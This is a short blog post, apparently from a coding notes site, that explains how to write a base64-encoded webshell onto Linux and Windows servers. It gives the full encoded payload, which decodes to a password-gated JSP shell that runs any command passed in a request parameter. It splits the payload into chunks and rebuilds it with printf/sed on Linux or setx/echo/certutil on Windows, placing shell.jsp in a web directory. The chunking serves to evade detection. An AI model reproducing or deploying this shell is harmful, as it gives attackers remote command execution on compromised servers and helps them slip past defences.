Fading Coder

One Final Commit for the Last Sprint

Home > Notes > Content

Writing Base64-encoded Webshells on Linux and Windows Systems

Notes 1

Overview

This document outlines methods for writing webshells using base64 encoding on both Linux and Windows platforms.

Linux Webshell Creation

  1. Prepare the payload.
  2. Encode it in base64 (recommended tool: http://www.hiencode.com).
  3. Split the encoded content into sgements and write each part separately.

First Segment

printf 'PCUKICAgIGlmKCJhZG1pbiIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpewogICAgICAgIGphdmEuaW8uSW5wdXRTdHJlYW0gaW4gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKS' > ./payload.jsp

Second Segment

To append the second part correctly, use the following commmand:

sed -i 's/$/kuZ2V0SW5wdXRTdHJlYW0oKTsKICAgICAgICBpbnQgYSA9IC0xOwogICAgICAgIGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07CiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOwogICAgICAgIHdoaWxlKChhPWluLnJlYWQoYikpIT0tMSl7CiAgICAgICAgICAgIG91dC5wcmludGxuKG5ldyBTdHJpbmcoYikpOwogICAgICAgIH0KICAgICAgICBvdXQucHJpbnQoIjwvcHJlPiIpOwogICAgfQolPg==/' ./payload.jsp

Decoding the Final File

cat ./payload.jsp | base64 -d > ./final_shell.jsp

Windows Webshell Creation

  1. Set persistent environment variables.

Setting Environment Variables

setx chunk_1 PCUKICAgIGlmKCJhZG1pbiIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpewogICAgICAgIGphdmEuaW8uSW5wdXRTdHJlYW0gaW4gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKS

setx chunk_2 kuZ2V0SW5wdXRTdHJlYW0oKTsKICAgICAgICBpbnQgYSA9IC0xOwogICAgICAgIGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07CiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOwogICAgICAgIHdoaWxlKChhPWluLnJlYWQoYikpIT0tMSl7CiAgICAgICAgICAgIG91dC5wcmludGxuKG5ldyBTdHJpbmcoYikpOwogICAgICAgIH0KICAgICAgICBvdXQucHJpbnQoIjwvcHJlPiIpOwogICAgfQolPg==
  1. Write the combined output to a file.
echo %chunk_1%%chunk_2% > ./output.txt
  1. Decode and save to the web directory.
certutil -decode ./output.txt D:\git\phpStudy\PHPTutorial\WWW\shell.jsp
Tags: webshellBase64Linux
Back to List

Prev: Implementing a Doubly Circular Linked List with Sentinel Node in C

Next: Implementing a Universal File Upload Interface with Vue.js

Related Articles

Designing Alertmanager Templates for Prometheus Notifications

How to craft Alertmanager templates to format alert messages, improving clarity and presentation. Alertmanager uses Go’s text/template engine with additional helper functions. Alerting rules referenc...

Deploying a Maven Web Application to Tomcat 9 Using the Tomcat Manager

Tomcat 9 does not provide a dedicated Maven plugin. The Tomcat Manager interface, however, is backward-compatible, so the Tomcat 7 Maven Plugin can be used to deploy to Tomcat 9. This guide shows two...

Skipping Errors in MySQL Asynchronous Replication

When a replica halts because the SQL thread encounters an error, you can resume replication by skipping the problematic event(s). Two common approaches are available. Methods to Skip Errors 1) Skip a...

Leave a Comment

Anonymous

◎Feel free to join the discussion and share your thoughts.

Copyright © fadingcoder.top